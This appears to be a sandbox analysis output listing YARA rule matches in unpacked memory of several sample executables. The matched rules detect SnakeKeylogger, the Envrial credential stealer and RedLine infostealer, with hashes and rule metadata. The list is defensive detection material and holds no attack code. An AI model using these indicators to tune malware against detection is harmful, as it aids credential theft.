Source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.BZTCUCKTKd.exe.16a46b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
